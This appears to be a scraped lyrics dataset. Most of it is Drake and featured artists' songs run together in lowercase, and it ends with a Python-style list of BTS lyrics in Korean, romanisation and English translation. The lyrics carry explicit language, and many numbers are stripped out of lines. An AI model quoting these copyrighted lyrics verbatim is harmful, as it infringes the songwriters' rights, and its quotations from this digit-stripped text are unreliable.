fucking red jacket with some zippers super good smidoke a package of the swisher's i did it overnight it couldn't happen any quicker y'all know them well fuck it me neither but point the biggest skeptic out i'll make him a believer it wouldn't be the first time i done it throwing hundreds when i should 
be throwing ones bitch i changes i see changes one thing 'bout music when it hits you feel no pain and i swear i got this shit that make these bitches go insane so they tell me that they love me i know better than that it's just game it's just what comes with the fame and i'm ready for that i'm just saying but i really can't complain everything is kosher two thumbs up ebert and roeper i really can't see the end getting any closer but i'll probably still be the man when everything is over i see changes so i'm riding through the city with my high beams on can you see me can you see me get your visine on y'all just do not fit the picture turn your widescreen on if you thinking i'ma quit before i die dream on man they treat me like a legend am i really this cold i'm really too young to be feeling this old it's about time you admit it who you kidding man nobody's ever done it like i did it uh i see changes ayobi hook andreena mills i gotta make it out or move quickly can't allow the past to restrict me but this time around they won't skip me i am the last hope don't hesitate not even for a second the hustle has become an obsession i'm on the front line with my weapon i am the last hope kardinal offishall can you imagine the last breath of christ the last breath of christopher wallace on that faithful night the last step that martin luther took as a man i got the power of my world in my hand the microphone brings life or death in the blink of an eye i was born to provoke those born to die i was conceived to beat all odds like las vegas tdot motherfucker watch the world rape us greatest strugglers hustle to succeed cross water smugglers tussle to burn weed it meets that pressure to success in the south niggas watching what i say magnifying my mouth i never take back talk i apply the force hand blistering from many years of holding the torch when the skin rebuilds it grows tougher than leather so we can keep on hold it forever my name's kardinall hook i gotta make it out 
or move quickly can't allow the past to restrict me but this time around they won't skip me i am the last hope don't hesitate not even for a second the hustle has become an obsession i'm on the front line with my weapon i am the last hope drake jealousy is something i haven't felt in years there's nobody around for me to be jealous of i bet you do a show in my city and no one cheers even if you make the music that ladies and fellas love dawg i'm incredible fuckin unforgettable but when it comes to records i will eat it if it's edible they say the futures always forseen that's why i'm steady getting more money more cream my flow is stuck in the moment that comes before dreams i stay avoiding unlucky like 4 and people get behind and they fight for em' cause he won't let no other niggas write for em' and even when its quite warm the attitude coursing through the veins and my city is an ice storm the name's drake and i don't take it for granted i can take it you offended cause i'm taken advantage man hook i gotta make it out or move quickly can't allow the past to restrict me but this time around they won't skip me i am the last hope don't hesitate not even for a second the hustle has become an obsession i'm on the front line with my weapon i am the last hope drake charlie sloth yeah i been waiting on this one charlie for real i've been waitin' driz i've been waitin' let's get 'em bro nah for real shout out boida too mm i like that let's get 'em driz you don't have a drink you're not drinking or what i got a drink bro hahahaha i like that i got my drink right here cheers my bro toast up man yeah okay yeah drake goldman sachs they wanna hold my racks hedge fund investors talk to adel like he the expert i hear it in they tone when they address him we way too connected tom ford assistant texted asking if i want classic or double breasted i flex with broad shoulders when i walk through the halls they move over stories of how we handle ours start to travel like a lone 
soldier i told you you hold your girl the same way that i hold composure or hold the wheel of the fuji white rover silverstein dinners all kosher never rushin' my niggas really made somethin' from nothin' dodge sentences like they don't wanna discuss it change subject got the benny yang chains rubbin' never tucked in waiting to inhale things that i own will sell at auction as proof we did well my house museumscale the only skeletons here are the ones from the nights i raised hell make sure the staff are paid well make 'em think twice 'bout the stories that they tell no one knows when the plan is hatchin' i'ma let 'em walk on eggshells tiptoe niggas better know interlude drake charlie sloth wow man like drizzy drake yeah got his foot on your neck man what time is it what time is it it's like two in the morning right now yeah well it's real late over here it's me and charlie that's it you hear me we got the whole building to ourselves we got the building kill them again kill them again driz kill them drake y'all keepin' the score while watchin' me score y'all keep the awards i'll take the rewards if y'all goin' for fun i'll stay and record but if y'all goin' to war i'm there for sure wouldn't miss it i'm living next to michael bobby ralph johnny my neighbors soundin' like new edition that's these guys us guys don't wear new balance or levi's key west retirement plan grippin' the callaway club in my hand hittin' balls off of the balcony into the sand tryna see where they land october firm the new chain of command el chico this is the explanation for the large ego 00 mill' hands free like ronaldinho i go from star to venetian in a small speedboat with girls we know take your pick brooke or tanya both those shorties'd leave their gps on so i can find ya drop location spring break trips i'm in hot rotation i took a lot of my brothers from b and e licks or the pot rotation to ridin' shotgun in a picasso painting tricks up sleeves have 'em playin' innocent to get the shits 
i need loyalty is priceless to me and this i see before i ever seen this shit tatted on p and tatted on c and tatted on me i speak truth and get to shatterin' dreams so it's best to tiptoe niggas better know yeah drake charlie sloth drizzy drake you're an animal drake you already know that you an animal bruh animal i'm saucy saucy you just stepped out of the club straight into the booth like it's light tear up the ting in one take showed up for you you know what i'm sayin' my brother drizzy my brother you already know wow and you know what it's like you stepped out the club into the booth to prove to everyone why you number one bro why you got your foot on their necks nah for real i stepped in here sn ovo fire in the booth charlie sloth come on the official i rock with the official i'm on official ting you know what it is man come on come on ayy bro it feels like that's another moment there you know what like i got to say this to you on the real bro the way that you've embraced british culture will be remembered forever and the uk love you the real g's over here you know that bro when you go to your parties you see who's in your parties nah you know what it is of course it's the certies nah listen but listen it's a family and it's a big family you know what it is i'm just happy to be home like i said man my brother man foot on neck time yo are these guys dumb you see the big man charlie too oh my goodness my brother drizzy i can hear these rappers' prayers man nah i'm heated for you right now they're like yo please tell drizzy to take his foot off my neck nah i'm heated right now man oh my goodness shout out french montana my brother you know what i'm sayin' the big wave yeah shout out huncho quavo shout out offset blessings on the new ting oh my goodness shout out yo i could go for hours charlie come on man ayy you could go for hours i was at your party the other night i've seen who was there i'm like woah there's a lot of people there was a lot of faces in that 
party nah i don't wanna hear no chat for the whole 8 about charlie sloth are you dumb alright jheeze jheeze and that right there one take a real moment right there yeah jhee and that's fire in the booth my guy and i'll be back januaryfebruary part two you know what time it is come on okay okay shout out all the g's too man shout out all the artists man everybody from here doin' their thing i'm telling you big inspiration london england come on man come on you know i've applied for your passport right hahaha i need that pre black leather glove no sequins buckles on the jacket it's alyx shit nike crossbody got a piece\u2005in\u2005it got a dance\u2005but it's really on some street\u2005shit i'ma show you how to get it it go right foot up left foot slide left foot up right foot slide basically i'm sayin' either way we 'bout to slide ayy can't let this one slide ayy post don't you wanna dance with me no i could dance like michael jackson i could give you thug passion it's a thriller in the trap where we from baby don't you wanna dance with me no i could dance like michael jackson i could give you satisfaction and you know we out here every day with it i'ma show you how to get it it go right foot up left foot slide left foot up right foot slide basically i'm sayin' either way we 'bout to slide ayy can't let this one slide ayy who's bad two thousand shorties wanna tie the knot ayy yeah two hundred shooters on my brother's block woah yeah petal off a rose like i love her not maybe not i don't know what's wrong with me i can't stop woah yeah won't stop woah yeah never stop got so many opps i be mistakin' opps for other opps got so many people that i love out of troubled spots other than the family i got it's either you or me that's just how i think it's either you or me this life got too deep for you baby two or three of us about to creep where they stayin' pre black leather glove no sequins buckles on the jacket it's alyx shit nike crossbody got a piece in it got a dance 
but it's really on some street shit i'ma show you how to get it it go right foot up left foot slide left foot up right foot slide basically i'm sayin' either way we 'bout to slide ayy can't let this one slide ayy who's bad toosie slide then i hit it doubletime then i hit a spin 'cause we spun their block a couple times if it's not the right time there'll always be another time i'm not even trippin' we'll just see 'em in the summertime woah yeah can't describe the pressure i be puttin' on myself yeah really i just can't afford to lose nobody else yeah if they movin' shaky we'll just do this shit ourselves woah if i'm movin' shaky chubbs'll do this shit himself yeah niggas only yolo for real heard a lot about you but we don't know for real next time guarantee the truth'll get revealed pre black leather gloves no sequins yeah buckles on the jacket it's alyx shit nike crossbody got a piece in it got a dance but it's really on some street shit i'ma show you how it go right foot up left foot slide left foot up right foot slide basically i'm sayin' either way we 'bout to slide ayy can't let this one slide ayy post don't you wanna dance with me no i could dance like michael jackson jackson i could give you thug passion passion it's a thriller in the trap where we from where we from baby don't you wanna dance with me no i could dance like michael jackson jackson i could give you satisfaction 'faction and you know we out here every day with it i'ma show you how to get it it go right foot up left foot slide left foot up right foot slide basically i'm sayin' either way we 'bout to slide who's bad drake yeah nicki minaj young money yeah drizzy's home baby pre drake baby you my everything you all i ever wanted we can do it real big bigger than you ever done it you be up on everything other hoes ain't never on it i want this forever i swear i could spend whatever on it 'cause she hold me down every time i hit her up when i get right i promise that we gon' live it up she make me 
beg for it 'til she give it up and i say the same thing every single time drake nicki minaj i say you the fucking best ayy you the fucking best ayy you the fucking best ayy you the fucking best ayy you the best i ever had best i ever best i ever had best i ever best i ever had best i ever best i ever had best i ever i say you the fucking drake trey songz know you got a roommate call me when its no one there put the key under the mat and you know i'll be over there yup i'll be over there shawty i'll be over there i'll be hitting all the spots that u ain't even know was there ha and you ain't even have to ask twice you can have my heart or we can share it like the last slice always felt like you was so accustomed to the fast life have a nigga thinking that he met you in a past life sweatpants hair tied chilling with no makeup on that's when you're the prettiest i hope that you don't take it wrong you don't even trip when friends say you ain't bringin' drake along you know that i'm working i'll be there soon as i make it home and she a patient in my waiting room never pay attention to them rumors and what they assume and until them girls prove it i'm the one to never get confused with 'cause pre drake baby you my everything you all i ever wanted we can do it real big bigger than you ever done it you be up on everything other hoes ain't never on it i want this forever i swear i could spend whatever on it 'cause she hold me down every time i hit her up when i get right i promise that we gon' live it up she make me beg for it 'til she give it up and i say the same thing every single time drake nicki minaj i say you the fucking best ayy you the fucking best ayy you the fucking best ayy you the fucking best ayy you the best i ever had best i ever best i ever had best i ever best i ever had best i ever best i ever had best i ever i say you the fucking nicki minaj ayo you the only one that see the real nicki i can show you chill nicki 'cause of how you deal wit me when they 
knock my blocks down you come and you build with me even though you real busy you still fuckin' real drizzy it's so amazing i figured out this world is ours with the taking i figured out that when i go out and all those people scream that's some of them are living vicariously through me that's why i put that s on my chest and i'm gone but on another note let's have sex in my dorm and i'ma make you beg 'cause you look pretty when you beggin' so meet me on the campus i'll be there around eleven so let me put my books down down excuse me if i look down down guess i'm a little nervous but i'm at your service look at what you took down down pre nicki minaj baby you my everything you all i ever wanted we can do it real big bigger then you ever done it you be up on everything other niggas never on it i want this forever i swear i can spend whatever on it that's why i hold you down every time you hit me up when i get right i promise that we gon' live it up i make you beg for it until i give it up you say the same thing every single time drake nicki minaj i say you the fucking best ayy you the fucking best ayy you the fucking best ayy you the fucking best ayy you the best i ever had best i ever best i ever had best i ever best i ever had best i ever best i ever had best i ever i say you the fucking drake sex love pain baby i be on that tank shit buzz so big i could probably sell a blank disc when my album drop bitches'll buy it for the picture and niggas will buy it too and claim they got it for they sister magazine paper girl but money ain't the issue they bring dinner to my room and ask me to initial she call me the referee 'cause i be so official my shirt ain't got no stripes but i can make your pussy whistle like the andy griffith theme song and who told you to put them jeans on doublecup love you the one i lean on feeling for a fix then you should really get your fiend on yeah just know my condo is the crack spot every single show she out there repping like a mascot 
get it from the back and make your fucking bra strap pop all up in yo slot until the nigga hit the jackpots i'm saying pre drake baby you my everything you all i ever wanted we can do it real big bigger than you ever done it you be up on everything other hoes ain't never on it i want this forever i swear i could spend whatever on it 'cause she hold me down every time i hit her up when i get right i promise that we gon' live it up she make me beg for it 'til she give it up and i say the same thing every single time drake nicki minaj i say you the fucking best ayy you the fucking best ayy you the fucking best ayy you the fucking best ayy you the best i ever had best i ever best i ever had best i ever best i ever had best i ever best i ever had best i ever i say you the fucking best ayy you the fucking best ayy you the fucking best ayy you the fucking best ayy you the best i ever had best i ever best i ever had best i ever best i ever had best i ever best i ever had best i ever drake nicki minaj ugh aww yeah aww yeah see this the type of joint you gotta dedicate to somebody this is just make sure they that special somebody an essay young money baby yeah yeah 0 bands 50 bands 00 bands fuck it man let's just not even discuss it man omg niggas sleep i ain't trippin' i'ma let 'em sleep i ain't trippin' let 'em rest in peace i can tell ya how it happened i can tell ya 'bout them safe house nights out in calabasas i can tell you not a rapper tryna sell this story i don't even open up the package who you with what you claim i was payin' mama's rent when was i turning 7 soda dirty like diana never clean my ex asked me where you movin' i said on to better things 0 bands 50 bands 00 bands fuck it man let's just not even discuss it man omg niggas sleep i ain't trippin' i'ma let 'em sleep i ain't trippin' let 'em rest in peace i been in the crib with the phones off i been at the house taking no calls i done hit the stride got my shit goin' in the six cooking with the wrist motion 
drapes closed i don't know what time it is i'm still awake i gotta shine this year i could never ever let the streets down haven't left the condo for a week now 0 bands 50 bands 00 bands fuck it man let's just not even discuss it man omg niggas sleep i ain't trippin' i'ma let 'em sleep i ain't trippin' let 'em rest in peace i've been on a mission haven't left the condo this that ovo that szn this that new toronto i get boxes of free jordan like i play for north carolina how much i make off the deal how the fuck should i know all my watches always timeless you can keep the diamonds treatin' diamonds of atlanta like it's king of diamonds take a flick i look like meechy look like bleu davinci i treat v live like it's 07 in magic city man i told my city i'd be gone 'til november then november came then i came right back on my worst behav' 6 god put both hands together that's amazin' grace 6 god selfish with the love i need all the praise woo they got me feelin' like the one again woo they got me feelin' like the one again yeah shout goes out to nike checks all over me i need a fuelband just to see how long the run has been 0 bands 50 bands 00 bands fuck it man let's just not even discuss it man omg niggas sleep i ain't trippin' i'ma let 'em sleep i ain't trippin' let 'em rest in peace i been in the crib with the phones off i been at the house takin' no calls i done hit the stride got my shit going in the 6 cookin' with the wriwriwriwri pimp c man get the fuck away from us we don't want nothin' but money we some family\u2005men\u2005we gettin' this\u2005paper know what i'm talkin' 'bout and i\u2005had to put that out there bun because a lot of\u205fniggas\u205fdoin'\u205flot of fugazi\u205fshit out here\u205fman love me save me tell me try me all you do is lie to me takin' me for granted i could tell all you do is lie to me lies don't excite me i'm lonely need more than a homie takin' me for granted i could tell all you do is lie to me and dub me you never love me any 
confidence i came with you take it from me i just wanna get beside you and make you love me i just can not take the silence you keep ignorin' me see you makin' all this time for more important things we was s'posed to catch a vibe the other night busy now but you was down that other time why you always lead me on and give me signs i just wanna get beside and make you mine i just wanna come inside and reunite got me waitin' outside hah love me save me tell me try me all you do is lie to me takin' me for granted i could tell all you do is lie to me lies don't excite me i'm lonely need more than a homie takin' me for granted i could tell diddy uhm you was just so in your pocket uhm cats used to tell me when they used to come to my house in miami and shit that that that they felt a feelin' of like they felt a lil' fucked up in they stomach but they was inspired 'cause they knew they they they had somethin' to see the dream for you know i done seen a lot of shit i ain't never seen a a young nigga as consistent as you that has affected the world in such a positive way since you know michael jackson and then when you've finally got the crib all you do is lie to me you did it like not even none of us did it you feel me uhm nah i mean i did it like that i ain't gon' lie i ain't gon' lie to you i did it like that but i ain't never been affected by another nigga crib in the way that did it to inspire me how cats told me that he'd been inspired all you do is lie to me and felt that feelin' in they gut like i gotta work harder need more than a homie well i mean workin' harder just to compete bro for real for real it's either you fuckin' in the game or you're out the game nigga i'm back in this motherfucker let's get some money it's over nigga you have arrived top five end of discussion may god bless you inshallah you know what i'm sayin' this your brother diddy take that and thank you for the inspiration jheeze what if i kissed you right now how would we explain it trying to 
imagine how it might sound if i just yelled out what if i kissed you right now would it bring us any closer take the weight off our shoulders take me i'm yours and i don't really care who knows it can we afford to be that open with all these emotions if we were a secret how long could you keep it keep it to yourself don't tell nobody else something away away something away with you you and you just be mine just be mine and you just be mine all mine and you just be mine just just be mine and you just be mine all mine what if i kissed you right now would it bring us any closer take a weight off of our shoulders tell on me i dont mind cause if they ask me about it i won't lie admit that i'm yours i don't really care who knows it can we afford to be that open with all these emotions if we were a secret tell me could u keep it keep it your yourself don't tell nobody else something away away something away with you you and you just be mine just be mine and you just be mine all mine and you just be mine just just be mine and you just be mine all mine what if i kissed you right now what if i kissed you right now just be mine just be mine and u just be mine all mine and u just be mine just just be mine and u just be mine all mine hook i take time to make that money some breakdowns get caked back money flip eight times get eight stacks money you can not get jack for free and my proceeds and cash right money there's no need to stash right money same four g's from last night money you cannot take that from me hey yo i'm movin' on up excuse a moi pardon it's me there's a new chapter to life that i'm starting to see and i'ma make and spend money to the hardest degree and on the low i probably mimic every artist i see i need a house a wifey a nice watch and a lot of cake i can't lie there's certain figures i gotta make and for my family this a shot that i gotta take cause where i live there's nobody as hot as drake which basically means who's faith in his team will resort to new 
cars briefcases with cream tryna find a space in the jeans for placing the green and a watch get they attention the bracelet's clean i'm stayin' the music wifey kinda need to be a band lover i keep it flow an old school like your grandmother i'm a tan brother they use rubber bands to keep his money intact if you don't like it you should ban rubber hook i take time to make that money some breakdowns get caked back money flip eight times get eight stacks money you can not get jack for free and my proceeds and cash right money there's no need to stash right money same four g's from last night money you cannot take that from me these days i really can't break 0s hunnid and make money money every month the government will take money from me make 750 look how quicky i spent that don't call me broke cause i strictly resent that last my p had to flip my the rent because the tax bracket i'm in's is 50 percent flat all because of ebay givin' me leway basically do the paypal i need a raise now seems every time a nigga stop and he eat i end up always tryna shop and compete they know a nigga 'bout it when it's in his size and cops it in more colors than popsicle pete till i'm piled to the top with receipts trust the store and i don't understand less is more wanna get 'em to the point where they owe me and they gon' see drake's on his job it's like hook i take time to make that money some breakdowns get caked back money flip eight times get eight stacks money you can not get jack for free and my proceeds and cash right there's no need to stash right same four g's from last night you cannot take that from me"]
bts10 = ["너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 47 하루 종일 니 생각만 했지 기대했던 첫 데이트 내게는 왠지 특별한 날이 될듯해 i can be a gentleman 'cause i'm your boyfriend 흠흠 고민 끝에 밤을 꼴딱 새워버렸지만 아침 해조차 깨지 않은 시간 하루가 왜 이렇게 긴 지 초침이 괜히 밉지 너랑 사귀게 된 뒤부터 매일 up된 feeling all night girl i think about you all night girl 내일이면 그댈 보게 돼 and i don't know what to say 너를 만나는 sunday 기다려왔던 sunday how we do how we do how we do uh yeah 시간아 조금만 빨리 달려줘 너를 만나는 sunday 상상만 했던 someday 오늘은 한숨도 못 잘 것 같아 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 내일은 꿈꾸던 데이트 날 참 예쁜 별과 예쁜 달 날 비추는 빛 오늘따라 더 모든 세상이 날 위한 것 같아 right 오늘 밤만큼은 plan man 널 위해서야 달링 만약 시간이 너란 주식이라면 투자를 하지 너와 입을 옷 choice 옷장을 포위 내 맘은 noise 흥에 나는 콧소리 니 생각만 가득했지 하루죙일 오늘 밤까지 니 환상에 잠 못 이루겠지 홀로 all night girl i think about you all night girl 내일이면 그댈 보게 돼 and i don't know what to say 너를 만나는 sunday 기다려왔던 sunday how we do how we do how we do uh yeah 시간아 조금만 빨리 달려줘 너를 만나는 sunday 상상만 했던 someday 오늘은 한숨도 못 잘 것 같아 자꾸 거울을 보고 괜히 심장이 뛰어 i don't wanna say no more feel like i don't wanna say no more i know oh 넌 i know 만들어 내 매일을 영화처럼 요즘엔 난 늘 sunday 하루하루 또 sunday how we do how we do how we do uh yeah 하루에 몇 번씩 절로 미소가 상상만 했던 someday 이제는 아냐 someday 괜히 난 웃고 있을 것만 같아 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday 너와의 첫 데이트 자꾸만 애처럼 설레 요즘 난 sunday 너라는 해가 뜬 sunday fall everything fall everything fall everything 흩어지네 fall everything fall everything fall everything 떨어지네 너 땜에 나 이렇게 망가져 그만할래 이제 너 안 가져 못하겠어 뭣 같아서 제발 핑계 같은 건 삼가줘 니가 나한테 이럼 안 돼 니가 한 모든 말은 안대 실을 가리고 날 찢어 날 찍어 나 미쳐 다 싫어 전부 가져가 난 니가 그냥 미워 pre but you're my everything you're my everything you're my everything you're my 제발 좀 꺼져 huh 미안해 i hate you 사랑해 i hate you 용서해 shit i need you girl 왜 혼자 사랑하고 혼자서만 이별해 i need you girl 왜 다칠 걸 알면서 자꾸 니가 필요해 post both i need you girl 넌 아름다워 i need you girl 너무 차가워 i need you girl i need you girl i need 
you girl i need you girl with it goes round and round 나 왜 자꾸 돌아오지 i go down and down 이쯤 되면 내가 바보지 나 무슨 짓을 해봐도 어쩔 수가 없다고 분명 내 심장 내 마음 내 가슴인데 왜 말을 안 듣냐고 또 혼잣말하네 또 혼잣말하네 또 혼잣말하네 또 혼잣말하네 넌 아무 말 안 해 아 제발 내가 잘할게 하늘은 또 파랗게 하늘은 또 파랗게 pre 하늘이 파래서 햇살이 빛나서 내 눈물이 더 잘 보이나 봐 왜 나는 너인지 왜 하필 너인지 왜 너를 떠날 수가 없는지 i need you girl 왜 혼자 사랑하고 혼자서만 이별해 i need you girl 왜 다칠 걸 알면서 자꾸 니가 필요해 post both i need you girl 넌 아름다워 i need you girl 너무 차가워 i need you girl i need you girl i need you girl i need you girl with girl 차라리 차라리 헤어지자고 해줘 girl 사랑이 사랑이 아니었다고 해줘 oh 내겐 그럴 용기가 없어 내게 마지막 선물을 줘 더는 돌아갈 수 없도록 ohoh i need you girl oh 왜 혼자 사랑하고 oh baby 혼자서만 이별해 i need you girl 왜 왜 다칠 걸 알면서 자꾸 니가 필요해 post both i need you girl 넌 아름다워 i need you girl yeah 너무 차가워 i need you girl i need you girl i need you girl i need you girl yeah i'm a born singer 좀 늦어버린 고백 i swear 언제나 멀기만 했었던 신기루가 눈 앞에 있어 여기 있어 i'm a born singer 어쩌면 이른 고백 그래도 너무 행복해 i'm good 난생 처음 방탄이란 이름으로 선 무대 삼년 전 첫무대의 마음을 다시 검문해 여전히 대구 촌놈 랩퍼와 다를게 없었지 but 아마추어란 단어 위에 프로란 단어를 덧 썼지 그토록 원하던 무대 랩을 하며 춤 출때 아직 살아 있음을 느껴 피곤하고 고된 출퇴근 따위는 견딜만해 내사람들이 지켜보니까 몸이 아파도 버틸만해 함성들이 밀려 오니까 데 전후의 차의점 아이돌과 랩퍼 사이 경계에 살아도 여전히 내 공책엔 라임이 차있어 대기실과 무대 사이에선 펜을 들고 를 써 이런 내가 니들 눈에는 뭐가 달라졌어 damn shit 난 여전해 내가 변했다고 what 가서 전해 변함없이 본질을 지켜 i'm still rappean 년전과 다름없이 랩하고 노래해 i'm out i'm a born singer 좀 늦어버린 고백 i swear 언제나 멀기만 했었던 신기루가 눈 앞에 있어 여기 있어 i'm a born singer 어쩌면 이른 고백 그래도 너무 행복해 i'm good 솔직해 두려웠었어 큰 소린 쳐놨는데 날 증명한다는게 펜과 책만 알던 애가 이제 세상을 놀래킨다는게 i dunno 세상의 기대치와 너무 비대칭 할까봐 두려웠어 나를 믿어줬던 모든 사람들을 배신하게 될까봐 무건운 어께를 펴고 첫 무대에 올라 차나의 짧은 정적 숨을 골라 내가 지켜봤던 사람들이 이젠 날 지켜보고 있네 항상 올려봤던 tv속 그들이 지금은 내 밑에 uh 주마등처럼 스칠 틈도 없이 한번뿐인 연극은 시작 돼버렸지 번만에 증발한 내 년의 피땀 피터지는 마이크와의 기싸움 몇십초일 뿐이었지만 똑똑히 쏟아내 i'm fucking real 야임마 니 꿈은 뭐야 나는 랩스타가 되는 거야 can't you feel 그리고 내려온 순간 그 함성 yeah i could read your mind uh yeah i could read your mind 물음표 내신 미소만 말없이 멤버들은 그저 내 어깨를 두드렸줬어 꼭 엊그제같은데 스무 밤이 흘러가 버렸어 and let the haters hate on me 걔네가 늘상 해온 일 니네가 키보드 놀릴동안 난 내 꿈들을 채웠지 썬글라스 hairstyle 뭘 욕하는지 알아 어쨌든 스무살에 너보다 잘나가는 나야 i'm a born 
singer 좀 늦어버린 고백 i swear 언제나 멀기만 했었던 신기루가 눈 앞에 있어 여기 있어 i'm a born singer 어쩌면 이른 고백 그래도 너무 행복해 i'm good 우리가 뛰었던 날 우리 같이 겪었던 날 년이란 시간 모두 하나가 됐던 마음 그렇게 흘린 피땀이 날 적시네 무대가 끝난 뒤 눈물이 번지네 매순간 마다 자신에게 다짐해 초심을 잃지 않게 한상 나답게 처음의 나에게 부끄럽지 않게 so we go we go we go 더 위로 위로 위로 all i'm a born singer 좀 늦어버린 고백 i swear 언제나 멀기만 했었던 신기루가 눈 앞에 있어 여기 있어 i'm a born singer 어쩌면 이른 고백 그래도 너무 행복해 i'm good i'm a born singer jom neujeobeorin gobaek i swear eonjenna meolgiman haesseotdeon shingiruga noon abe isseo yeogi isseo i'm a born singer eojjeomyeon ireun gobaek geuraedo neomu haengbokhae i'm good nansaeng cheoeum bangtaniran ireumeuro seon mudae samnyeon jeon cheotmudaeui maeumeul dashi geomunhae yeojeonhi daegu chonnom raeppeowa dareulge eobseotji but amachueoran daneo wie peuroran daneoreul deot sseotji geutorok weonhadeon mudae raepeul hamyeo choom choolddae ajik sala isseumeul neuggyeo pigonhago godwin chooltwindae ddawineun gyeondilmanhae naesaramdeuli jikyeobonigga momi apado beotilmanhae hamseongdeuli millyeo onigga debwi jeonhooui chauijeom aidolgwa raeppeo sai gyeonggyeeh salado yeojeonhi nae gongcheken raimi chaisseo daegishilgwa mudae saieseon peneul deulgo gasareul sseo ireon naega nideul nooneneun myeoga dallajweosseo damn shit nan yeojeonhae naega byeonhaetdago what gaseo jeonhae byeonhameobshi bonjileul jikyeo i'm still rappean samnyeonjeongwa dareumeobshi raebhago noraehae i'm out i'm a born singer jom neujeobeorin gobaek i swear eonjenna meolgiman haesseotdeon shingiruga noon abe isseo yeogi isseo i'm a born singer eojjeomyeon ireun gobaek geuraedo neomu haengbokhae i'm good rap monster soljikhae duryeoweosseoseo keun sorin chweonwatneunde nal jeungmyeonghandaneun pengwa chaekman aldeon aega ije sesangeul nollaekindaneunge i dunno sesangui gidaechiwa neomu bidaeching halggabwa duryeoweosseo nareul mideojweodeon modeun saramdeuleul bashinhage dwilggabwa mugwonun eoggeoreul pyeogo cheot mudaee olla chanaui jjalbeun jeongjeok soomeul golla naega jikyeobwatdeon saramdeuli ijen 
nal jikyeobogo itne hangsang ollyeobwatdeon tvsok geudeuli jigeumeun nae miteh uh jumadeungcheoreom seuchil teumdo eobshi hanbeonbbunin yeongeukeun shijak dwaebeoryeotji sambeonmane jeungbalhan nae samnyeonui piddam piteoeun maikeuwaui gissaoom myeotshibchoil bboonieotjiman ddokddokhi ssodanae i'm fucking real yaimma ni ggumeun myeoya naneun raebseuteoga dwaneun geoya i can't you feel geurigo naeryeoon soogan geu hamsung yeah i could read your mind uh yeah i could read your mind mooleulpyo naeshin misoman maleobshi membeodeuleun geujeo nae eoggeoreul dudeuryeosseo ggok eotgeujegateunde seumu bami heulryeobeoryosseo and let the haters on me gyaenega neulsang haeohn il ninega kibodeu nolrildongan nan nae ggumdeuleul chaeweotji sungeullaseu hairstyle wae yokhaneunji ara eojjaetdeun seumusale neoboda jalnaganeun naya i'm a born singer jom neujeobeorin gobaek i swear eonjenna meolgiman haesseotdeon shingiruga noon abe isseo yeogi isseo i'm a born singer eojjeomyeon ireun gobaek geuraedo neomu haengbokhae i'm good uriga ddwieotdeon nal uri gachi gyeokeotdeon nal samnyeoniran shigan modu hanaga dwaetdeon maeum geureoge heulrin piddami nal jeokshine mudaega ggeutnan dwi noonmooli beone maesungan mada jashinege dajimhae choshimeul ilji anhge hansan nadamge cheoeumui naehge buggeureobji ahnge so we go we go we go deo wiro wiro wiro all i'm a born singer jom neujeobeorin gobaek i swear eonjenna meolgiman haesseotdeon shingiruga noon abe isseo yeogi isseo i'm a born singer eojjeomyeon ireun gobaek geuraedo neomu haengbokhae i'm good english translation i'm a born singer just a bit late to confess i swear there's a mirage right here always far from me yes it's here i'm a born singer just a bit early to confess anyway i'm so happy i'm good the very first stage named as bts remind the mind three years ago i had still i was a hick but i became a pro no more amateur when i'm on stage rapping and dancing which i wanted so badly i feel alive although it's hard and tough i can handle 
it cause you're supporting me i can stand the pain cause i can hear shouting my name i'm in a boundary between idol and rapper still my notes are full of rhymes i write down the lyrics between on and off stage do i look something different i used to be damn shit i am still who i am something changed go tell them nothing changed i'm still a rapper man i still rap and sing as years ago i'm out refrain i'm a born singer just a bit late to confess i swear there's a mirage right here always far from me yes it's here i'm a born singer just a bit early to confess anyway i'm so happy i'm good rap monster frankly i was afraid to prove the big mouth i've told how to surprise the world with something else i dunno maybe i'll let you down i was afraid of making my people down but i straighten my shoulders and make my debut the moment of silence get my breath back the people i've seen are now staring at me fancy tv stars are now below me uh it was a very fast time the only once play has started it just took minutes to show my years the fierce fought with mic though it's a few seconds i put everything in i'm fuckin' real hey you what do you dream mine is a rapstar can't you feel the shouts after the stage yeah i could read your mind uh yeah i could read your mind no more questions just smile my team just tapped my shoulder it seems like yesterday but already past 0 days and let the haters on me it's their job when you play with the keyboard i've made my career sunglasses hair style know why you insult me anyway on 0 years old i'm better than you refrain i'm a born singer just a bit late to confess i swear there's a mirage right here always far from me yes it's here i'm a born singer just a bit early to confess anyway i'm so happy i'm good remember the day we've been through years we were as one that extremely hard days make me wet after the stage drop the tears every single time swear not to forget the very first intention always like me live up to me so we go we go we go more up 
